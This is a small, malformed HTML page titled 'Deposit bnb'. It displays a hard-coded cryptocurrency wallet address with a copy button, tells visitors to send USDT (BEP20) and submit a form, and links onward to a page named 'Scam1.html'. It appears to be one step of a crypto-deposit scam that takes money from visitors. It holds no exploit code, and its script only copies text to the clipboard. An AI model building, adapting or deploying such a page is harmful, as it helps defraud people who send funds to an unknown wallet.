<html>
<title>Deposit bnb</title>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<center>
<img url="https://raw.githubusercontent.com/Sharif112ui/Tron-Hub/main/IMG_20230221_133754.jpg"width="270"height="370"></img>
<style>
body {
              background-color:white;
              font-family: 'Oswald', sans-serif;
      }
p
{
  color:black;
  font-size:17px;
}


button1
{
  height:px;
  width:70px;
  border-radius:4px;
  padding:10px;
  font-size:10px;
  font-family: 'Oswald', sans-serif;
  height:40px;
  cursor:pointer;
  background-color:yellow;
}
</style>
<link href='https://fonts.googleapis.com/css?family=Oswald' rel='stylesheet' type='text/css'> 

<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>

<center>
<p id="p1">0xAA830C81418e2185C15EB403E7F8D5926d413bBe</p>
<button1 onclick="copyToClipboard('#p1')">Copy Adress</button1><br><br>
<font color="red"> Send USDT(BEP20) And Suhmit The Form
<script>
function copyToClipboard(element) {
  var $temp = $("<input>");
  $("body").append($temp);
  $temp.val($(element).text()).select();
  document.execCommand("copy");
  $temp.remove();
}
</script></font></center></center></head></html>

<html>
<head>
<style>
button {
			background-color: red;
			color: white;
			padding: 14px 20px;
			margin: 8px 0;
			border: none;
			border-radius: 4px;
			cursor: pointer;
			width: 50%;
		}

		button:hover {
			background-color: #45a049;
		}
		</style>
<br>
<center><button onclick="location.href='Scam1.html'">Next</button>
